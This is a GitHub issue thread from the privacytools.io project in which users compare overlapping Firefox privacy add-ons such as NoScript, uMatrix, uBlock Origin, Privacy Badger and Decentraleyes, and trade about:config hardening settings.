Closed privacytoolsIO closed 5 years ago
All of those addons have their own roles to play, and don't replace any other completely on their own. Perhaps it'd be more useful to suggest combinations of them, and give notes on what is gained and lost from different suggestions. As it seems to always be the case, it's going to really be down to the user and how active a role they want to play.
To start: NoScript has some features other addons don't. It protects against HTTPS cookie hijacking, it has a more robust XSS filter, ABE, CSRF, and ClearClick which protects against Clickjacking / UI-redressing attacks independently from JavaScript and plugins blocking.
Decentraleyes does a job that after allowing the trusted resources, other addons will not do. That is, it emulates Content Delivery Networks (CDNs) locally by intercepting requests, finding the required resource and injecting it into the environment. This helps with privacy by ultimately reducing your browsing footprint.
My suggestion would be:
Must haves which also require little user input:
Additional security that requires active user input (not all at simultaneously):
Replace Disconnect with Privacy Badger. uBlock does what Disconnect does, but not what Privacy Badger does. Both uBlock and Disconnect use a shared list, whereas Privacy Badger learns what are trackers from your browsing.
@Shifterovich I've removed Disconnect and Privacy Badger a while ago: https://www.privacytools.io/#addons
So uBlock + Privacy Badger is a good combo?
@privacytoolsIO Please recommend Privacy Badger for Firefox and Firefox for Android.
https://addons.mozilla.org/en-US/android/addon/privacy-badger17/ "Works with Firefox for Android 48.0 - *, Firefox 50.0 and later"
Here's a combo that I think balances security and ease-of-use fairly well:
fake readout API
-- Show notifications: unchecked
checked
checked
-- Forbit META redirections inside network.websocket.enabled OFF network.http.sendSecureXSiteReferrer ON network.proxy.type 5 dom.event.clipboardevents.enabled OFF dom.storage.enabled ON dom.indexedDB.enabled ON dom.battery.enabled OFF dom.enable_user_timing OFF dom.enable_resource_timing OFF dom.netinfo.enabled OFF layout.css.visited_links_enabled ON browser.safebrowsing.enabled OFF browser.safebrowsing.downloads.remote.enabled OFF browser.safebrowsing.malware.enabled OFF browser.send_pings OFF beacon.enabled OFF privacy.donottrackheader.enabled privacy.trackingprotection.enabled ON dom.enable_performance OFF datareporting.healthreport.service.enabled OFF datareporting.healthreport.uploadEnabled OFF toolkit.telemetry.enabled OFF toolkit.telemetry.unified OFF media.peerconnection.enabled ON (see uBlock Origin advanced settings) media.peerconnection.ice.default_address_only ON media.eme.enabled ON media.gmp-eme-adobe.enabled ON webgl.disabled OFF geo.enabled OFF camera.control.face_detection.enabled ON device.sensors.enabled OFF security.tls.unrestricted_rc4_fallback OFF security.tls.insecure_fallback_hosts.use_static_list OFF security.ssl.require_safe_negotiation ON security.ssl.treat_unsafe_negotiation_as_broken OFF
network.cookie.lifetimePolicy = 0
. As with NoScript, whitelist should be kept minimal.
-- Strict Cookie Access Policy: checked
checked
-- suspendTabsUntilReady: true
-- Prevent WebRTC from leaking local IP addresses: checked
(does not disable WebRTC functionality)
-- 3rd-party: Blocked globally@Marc05 Also, Random Agent Spoofer.
Using CanvasBlocker to generate a new hash on every API call is best in any situation as far as I can tell. The tracker essentially has two options: Assume it's random, hence useless; or derive a new identity with the hash. Both of which are better than providing a legitimate hash, since best case is there's an extremely common hash, which would provide a higher amount of identifying bits of information.
Some people prefer Canvas Defender. I agree that Canvas Blocker is better than Canvas Defender, but we should mention Canvas Defender too, as neither is a perfect solution.
The only time I can think of someone needing that is to allow sites to track for a certain period of time, then resetting when done. In that situation, one could just whitelist the website, and remove it after.
Would reveal one's native fingerprint. Disabling Canvas Blocker, enabling Canvas Defender, and generating a new hash for such session is optimal.
True... though I'd only go as far as an asterisk.
minimally and without much breakage:
NoScript General set to Temporarily Allow Top Level sites by default, base 2nd level names reload current tab only
Notifications (Personal Preference) uncheck both show messages about blocked scripts and ABE to avoid annoying bar and to just use the icon to trust/untrust stuff
Privacy Settings - set to Privacy (compatible) and Security https://addons.mozilla.org/en-US/android/addon/privacy-settings/ under advanced settings some of it is personal preferences, other things cause a little breakage with single-signon sometimes
No Resource URI Leak https://addons.mozilla.org/en-US/android/addon/no-resource-uri-leak/
UBlock and Privacy Badger are both ok but for privacy essentially redundant to NoScript except cosmetic filters can clean up pages but you're blocking the essentials with Noscript and Privacy Settings changes.
The only thing I left out is referrer control, some of the fingerprinting stuff, and random user agent stuff because they act a little goofy. There's a bunch of back and forth whether over-blocking fingerprinting in itself makes you unique. Random user agent junk makes webpages look wonky sometimes and I'd rather not fool with it.
As for Self-Destructing Cookies, simply going into Firefox and unchecking allowing 3rd party cookies does most of the job already.
Regardless, I still can't Disqus to log in without turning off like half the privacy controls out there.
@Marc05 Some Firefox addons listed are redundant, as NoScript and uBlock.
Noscript + Adblock Plus was an unrivalled combo, until uBlock Origin made its appearance, substituting both and dropping the acceptable ads. With various Filter Lists available it works great, while uMatrix has no lists at all and is light on resources.
Privacy Badger is primarily a privacy tool, not an ad blocker.
https://www.eff.org/privacybadger
Privacy Badger has a cookie blocking functionality. I don't know about NoScript. However, I know about uMatrix and I think the cookie functionality of PB is redundant with the one of uMatrix.
Apart from this functionality, the only appeal of PB is the list-less feature, which is pretty dubious anyway (no need for discover the wheel again, people have been maintaining great blocking lists for more than 10 years).
Regarding HTTPS Everywhere, I prefer to use Smart HTTPS: https://addons.mozilla.org/en-US/firefox/addon/smart-https/ Reasons are:
@Marc05 When you wrote "3rd-party: Blocked globally" for uBlock origin, I think you referred to an old version because I don't see this option in my setup, but I see it mentioned at Decentraleyes with uBlock and uMatrix
@Marc05
I was curious so I compared your recommended settings for Privacy Settings vs the settings Privacy (Compatible) & Security
. I am dumping the differences here in case someone wants to copy your settings faster: basically, one has to choose the settings Privacy (Compatible) & Security
and then toggle these accordingly.
Browser dom.event.clipboardevents.enabled OFF browser.safebrowsing.enabled OFF browser.safebrowsing.downloads.remote.enabled OFF browser.safebrowsing.malware.enabled OFF
Media media.eme.enabled ON media.gmp-eme-adobe.enabled ON webgl.disabled OFF
Devices camera.control.face_detection.enabled ON
Encryption security.ssl.require_safe_negotiation ON security.ssl.treat_unsafe_negotiation_as_broken OFF
The Browser change dom.event.clipboardevents.enabled
improves privacy.
The other Browser changes are up to the user's preferences to trade security vs privacy.
The Media changes decrease both security and privacy.
The Devices change decreases privacy.
The Encryption changes break a website such as the Humble Store: https://www.humblebundle.com/store/
@woctezuma Thanks for doing that. I was curious about it before, but never did it.
Disabling clipboard events, e.g. dom.event.clipboardevents.enabled OFF
, breaks Google Docs copy/paste functionality. Personally, turn it on temporarily whenever required.
The media.
settings would prevent some DRM content from playing on websites if disabled; and webgl functionality can be kept safely if using the setting of uBlock Origin.
Disabling the face detection feature seems to be pointless, given that camera permission would have to be given in the first place, and recognizing a face mid-stream wouldn't really add anything without the specifics of the picture. And if you have the picture, local face recognition doesn't really matter.
As for ssl negotiation, I should have kept that as OFF, given that many major sites are still using outdated versions.
Just a quick note, when you set dom.enable_user_timing
to off
the Gosthery's info screen/panel isn't working anymore. (just blank, no info anymore)
So you need to leave it to "on" if you use Gosthery.
Not sure if this list is updated any more but I found some addons that seam to improve security a bit.
Nano Defender: https://jspenguin2017.github.io/uBlockProtector/ an Anti-Ad Block Defuser which means you don't have to turn off uBlock on certain site anymore. Designed for Nano Adblocker, which is based on uBlock, so it requires some workarounds for vanilla uBlock compatibility.
Pure URL: https://addons.mozilla.org/en-US/firefox/addon/pure-url/ removes url garbage, such a google analytics and such.
Unshorten.link: https://addons.mozilla.org/en-US/firefox/addon/unshorten-link/ unshortens shortened url link (yes those annoying things). This one is made by a for profit organization, unfortunately, but I've yet to find a better alternative.
P.S. are Canvas Blocker and Defender relevant at all for security? I saw them mentioned above in this thread.
I tried Pure URL and I was not too convinced. There were URL which were not stripped, and others which were stripped too much. I'm more satisfied with Neat URL: https://addons.mozilla.org/firefox/addon/neat-url/
As for Canvas, it is just for tracking. No relevance for security.
Hi, I use very similar recommendations on my tutos, do you think there will be redundancy between the new FF 63 anti tracking tool and decentraleyes or privacy badger ?
@kewde @beardog108
do you think there will be redundancy between the new FF 63 anti tracking tool and decentraleyes or privacy badger ?
The FF internal anti tracking is a joke compared to uBlock Origin. Also you don't need Privacy Badger Decentraleyes isn't the same like a ad- or tracking blocker. It replace librarys, you should read again what exactly it is.
Disconnect uses the same lists as uBlock. Privacy Badger blocks what it thinks are unnecessary tracking requests. Decentraleyes replaces CDN libraries with local cache, I think.
So uBlock + Privacy Badger + Decentraleyes is a good combination.
If you have uMatrix, you do not need NoScript. However by default uMatrix does not block all first party scripts.
Currently I am using:
I posted about this on Reddit
Why not use both? Their features overlap. They complement each other.
Using both at the same time is a complete waste of time. There's nothing that can be done with NoScript that cannot be done with uMatrix. I looked at this in the past.
uMatrix automatically allows all fist party scripts,while blocking the rest.
If you want it that way, or you can How to block 1st party scripts everywhere by default.
If you permit a script on one site, you have to enable the script on each site that uses it. And example is googlegettagservices.
Not if you How to create rules which apply everywhere, on all web sites.
Others have mentioned uMatrix has better documentation and UI. uMatrix also has some unique features such as Ruleset recipes and umatrix hosts files (they show up as dark red for bad hosts).
The uMatrix logger is really handy to determine what is happening.
NoScript is also terrible at handling subdomains. When you enable List full addresses in the permissions popup (https://www.noscript.net), you get a mess. An example of that with NoScript. Which is a lot easier in uMatrix. I only needed JavaScript on cdn-au.piano.io
not buy-au.piano.io
or experience-au.piano.io
. Additionally NoScript gave me no way to control XHR content on experience-au.piano.io
which I needed for the text in the article to load.
It is clearly something that was an afterthought. uMatrix's UI handles subdomains and whitelisting parts of domains a LOT more efficiently.
Also, uMatrix is available for Chrome, where as NoScript never got ported (you'd have to use an alternative like ScriptSafe). Raymond Hill (gorhill) has done an excellent job.
I did use NoScript for many years, but I think uMatrix is better, particularly after you realize it's power.
Edit:
uMatrix is available for Chrome,
For the moment.
Wow, fancy that. Web ad giant Google to block ad-blockers in Chrome. For safety, apparently
I like this How many ad blocks could an ad slinger block if an ad slinger could block blocks?
@tya99 instead of blocking cookies better use container
@tya99 instead of blocking cookies better use container
I have done a bit of research and I think you might be right. I was having a look at https://github.com/ghacksuserjs/ghacks-user.js/wiki/4.1-Extensions looking to see how I could improve things. I do think that page might be outdated.
It would appear currently I wasn't protecting against cache related tracking with HTTP ETags. Using this website https://lucb1e.com/rp/cookielesscookies/ I was able to test it. That recommended extensions page mentions ETag Stoppa however it does say:
Keep in mind that ETags are only one of the known tracking vectors related to the cache. I am aware of at least three other less straightforward methods to exploit the cache for tracking. If you are absolutely serious about your privacy, do not rely on this extension. Instead, disable the cache and/or use another extension like Temporary Containers in automatic mode.
Additionally it seems there's some types of cookies that cannot be deleted through the WebExtension API:
:exclamation: APIs do not exist to allow clearing IndexedDB, Service Workers cache, appCache, or cache by host. Clearing cookies & localStorage on their own, and leaving orphaned persistent data is a false sense of privacy. Check here
It appears for many of those APIs they do exist now. As it says in that link on the Cookie-AutoDelete FAQ "(API available, but none to clean by host)" so this must mean it was added at some point.
So I am thinking Temporary Containers might be the way to go instead of Cookie AutoDelete in the global container.
I was also thinking of installing ClearURLs. I think it might be better than NeatURLs, more maintained and mature. I really hate those tracking parameters.
I noticed they recommend Violentmonkey. I was surprised about that after reading Discussion: Greasemonkey, Tampermonkey, Violentmonkey, which one is best for a privacy conscious person?.
I have been using Greasemonkey without any issues. I use it with
I also noticed CSS Exfil Protection. I'm not sure if anything I've got currently can satisfy this but I don't think so. According to the developer's test site my browser was vulnerable.
In the past I had been using privacy.resistFingerprinting = true
for canvas protection. I'm not sure this is the greatest idea. When setting that to true the test site says my uniqueness is "× False (Tor Browser signature)". I can't imagine there'd be many people with that signature that are not coming from a Tor exit node.
Perhaps I should install something like CanvasBlocker. When using that with the Block mode "fake" it said Uniqueness 100% (0 of 358283 user agents have the same signature).
Come to think of it the only non-privacy related addon I use is Tree Style Tab and Markdown Here. The internet is such a cesspool of tracking and advertising these days.
Resist fingerprinting is fine and recommend in gHacks user.js Also better solution then canvas blocker add-on and don't forget that this simple setting don't just change canvas. It change a lot!
Resist fingerprinting is fine and recommend in gHacks user.js Also better solution then canvas blocker add-on and don't forget that this simple setting don't just change canvas. It change a lot!
I might just do that then. I like to avoid addons if I can help it. On mobile Android it seems Temporary Container isn't supported because of tabs.create API on Android does not support cookieStoreId.
I guess there I will go with ETag Stoppa instead. I find browser.cache.offline.enable = false
a little inconvenient.
I'm not currently using https://github.com/ghacksuserjs/ghacks-user.js/blob/master/user.js I am however just using most of the tweaks from https://www.privacytools.io/#about_config
@beerisgood
@tya99 instead of blocking cookies better use container
There's a nice writeup about that here https://medium.com/@stoically/enhance-your-privacy-in-firefox-with-temporary-containers-33925cd6cd21
@stoically points out that in that post that:
Also with localStorage support enabled you make fingerprinting easier, because CAD needs to set a cookie for the domains you visit and CAD can’t clear indexebDB storage at all. If you want to see it yourself try filling your indexedDB and localStorage with 5kb on this site. Now close the tab (and click Clean depending on your settings), open the site again and you’ll see that the indexedDB storage is still there.
Also ghacks-user points out:
:exclamation: APIs do not exist to allow clearing IndexedDB, Service Workers cache, appCache, or cache by host. Clearing cookies & localStorage on their own, and leaving orphaned persistent data is a false sense of privacy. Check here
What I am missing in all lists are the performance implications of add-ons. Privacy badger, for example, adds, at least on my machine, a significant amount of time to page loads (think ~1s). This is in combination with uBlock Origin.
I'll try to see if I can get some dependable performance metrics sometime soon.
@abuisman try without privacy badger ;)
@beerisgood that is what I did, how else do you think I found out about the difference? ;)
For now, I am using firefox’s built in ad blocking and new protections against crypto mining and I block all third party cookies. That last thing is what I used privacy badger most for anyway
Remember that the internal feature (disconnect list) only block few ads. You should use uBlock Origin instead. Even the gHacks.js team recommend that way
Also the internal disconnect list has whitelists (connections that will be always allowed).
@beerisgood and @atavic I meant instead of privacy badger. I also have ublock origin running with blocks for all third-party requests by default. I then allow them 1-by-1 to make websites work
@beerisgood and @Atavic I meant instead of privacy badger. I also have ublock origin running with blocks for all third-party requests by default. I then allow them 1-by-1 to make websites work
Unlock origin and Firefox tweaks are good enough. If you like you can use more filter lists in ublock for example:
https://github.com/notracking/hosts-blocklists https://github.com/yourduskquibbles/webannoyances https://gitlab.com/ZeroDot1/CoinBlockerLists https://github.com/CHEF-KOCH/BarbBlock-filter-list https://github.com/CHEF-KOCH/Audio-fingerprint-pages https://v.firebog.net/hosts/static/w3kbl.txt
(Although webannoyance is not security list and is an annoyance filterlist and may you don't like them but it was great for me)
Also I think Firefox blocker is redundant with unlock and will lower speed of browser but its fingerprinting and cryptominer blocklists are good.
Also there are great lists in firebog.net and filterlists.com
Also these prefs are really good:
require safe negotiation (it breaks some websites that uses bad ssl config) also you can go to https://www.ssllabs.com/ssltest/viewMyClient.html and https://browserleaks.com/ssl and go to about:config and disable any vulnerable ciphers for ex. 3DES, All SHA1 hashs, All CBCs and All those that don't have forward Secrecy
Also a good pref for security (in this case may be not privacy very much) is enabling trr.mode to 2 (you also should set bootstrap address to 1.1.1.1) this will set your browser to use cloudflare's DNS over HTTPS when it is faster and is good because your ISP can't fool your browser to fake website IP.
Although the treat model in everyone differs for example I prefer some privacy downgrades for better protection against my ISP.
https://github.com/CHEF-KOCH/BarbBlock-filter-list https://github.com/CHEF-KOCH/Audio-fingerprint-pages
I hightly not recommend that lists. They're outdated and just stealed work from other guys, without any notice about. If you need lists, (you post it already) use Firebog.net
Also stay with https://github.com/ghacksuserjs/ghacks-user.js/blob/master/user.js
Thanks
https://github.com/CHEF-KOCH/BarbBlock-filter-list https://github.com/CHEF-KOCH/Audio-fingerprint-pages
I hightly not recommend that lists. They're outdated and just stealed work from other guys, without any notice about. If you need lists, (you post it already) use Firebog.net
Agree, Thanks :)
Also stay with https://github.com/ghacksuserjs/ghacks-user.js/blob/master/user.js
Thanks, I downloaded it but was busy and coudn't look at it till now :D
What is your opinion about other outdated blocklists if they don't affect browsing? Better than nothing or not worth?
Worth mentioning that Also what I noticed is that using lists with low amount of eyes in them can have potential to whitelist some trackers/... by their own.
I just want to give an update, there's a fork of ublock made by the same guy who made nano defender called nano adblocker. Apparently he called it so because he cleaned up the code making it lighter and faster, or so claimed. It does have the advantage though of requiring less configuration when used with nano defender, but mainly that's because it was designed to work with it. Also Raymond Hill (the guy who made ublock) has his own accessory addon for ublock/nano called ubo-scope and it measures your 3rd party exposure.
Also, I just want to say I tried to configure all these with waterfox and it didn't go so well as it's extension api is still based on firefox 57. I tried it due to some people voicing concerns of mozilla's recent choices with respect to privacy.
Lastly, privacytools.io has added canvasblocker to it's recommended list as of late, but there seem to be several alternatives to the https forcing, canvas fingerprinting protection, cookie purging/isolating and url decluttering/cleaning extensions available, such as smart https. Curious to know what you guys think would be the best combination of the four. Also the guy who made smart https also has fingerprint protection extensions for webgl and certain types of audio content; didn't even know those could be fingerprinted.
If your browser is based on a previous version of Firefox, you can get a previous version of the addon that still works with FF 57.
If your browser is based on a previous version of Firefox, you can get a previous version of the addon that still works with FF 57.
That doesn't seam like a very good idea for security addons, like the ones discussed here. Older version could have security flaws, in addition some, like nano adblocker and defender as well as redirect amp to html, don't have compatible older versions period.
Also, I just want to say I tried to configure all these with waterfox and it didn't go so well as it's extension api is still based on firefox 57. I tried it due to some people voicing concerns of mozilla's recent choices with respect to privacy.
I think we should adjust to Mozilla choices, they started to make Firefox more efficient so I think we should just wait for them to rise up more.
I believe that may be their choices be sometimes disappointing for paranoid users but some of them are really necessary. For ex. people concern about telemetry but telemetry is exactly what made chrome this much fast. The software vendors can't blindly develope their products, they should know problems. especially very low amount of people report bugs frequently.
or about old addons, I agree that some of them was great but Mozilla with this decision will waste lower time to compatibility fix and spend more resources for developing the core browser.
Lastly, privacytools.io has added canvasblocker to it's recommended list as of late, but there seem to be several alternatives to the https forcing, canvas fingerprinting protection, cookie purging/isolating and url decluttering/cleaning extensions available, such as smart https. Curious to know what you guys think would be the best combination of the four. Also the guy who made smart https also has fingerprint protection extensions for webgl and certain types of audio content; didn't even know those could be fingerprinted.
I think the first party isolation, prevent fingerprinting and clear data on exit options in Firefox is sufficient for that because every action you do for prevention, make your fingerprint more unique, so we should just use them to get lost in our crowd.
especially it has convas prevention built in, cookie, web storage and ... separation built in (first party isolation) plus many more.
I'm closing this issue because I believe our extensions list is fairly comprehensive with no significant overlap of tasks.
I'm closing this issue because I believe our extensions list is fairly comprehensive with no significant overlap of tasks.
It is getting rather long! But ... reading through, I see there is variation over time, as add-ons are improved, abandoned or new ones added. Is there a need for PT to do a regular review of such add-ons, say quarterly, or more realistically, annually?
And should this be raised as a separate issue?
I think you may be looking for https://github.com/privacytoolsIO/privacytools.io/issues/1328 or something listed there.
Hi guys,
I've been removing several Firefox addons in the past weeks because they were redundant with each other. We should not recommend several Firefox addons that are doing the same job. I'm not sure about these four addons at the moment: uBlock, Decentraleyes, uMatrix and NoScript.
Please help me out. Should we remove some more?
Thanks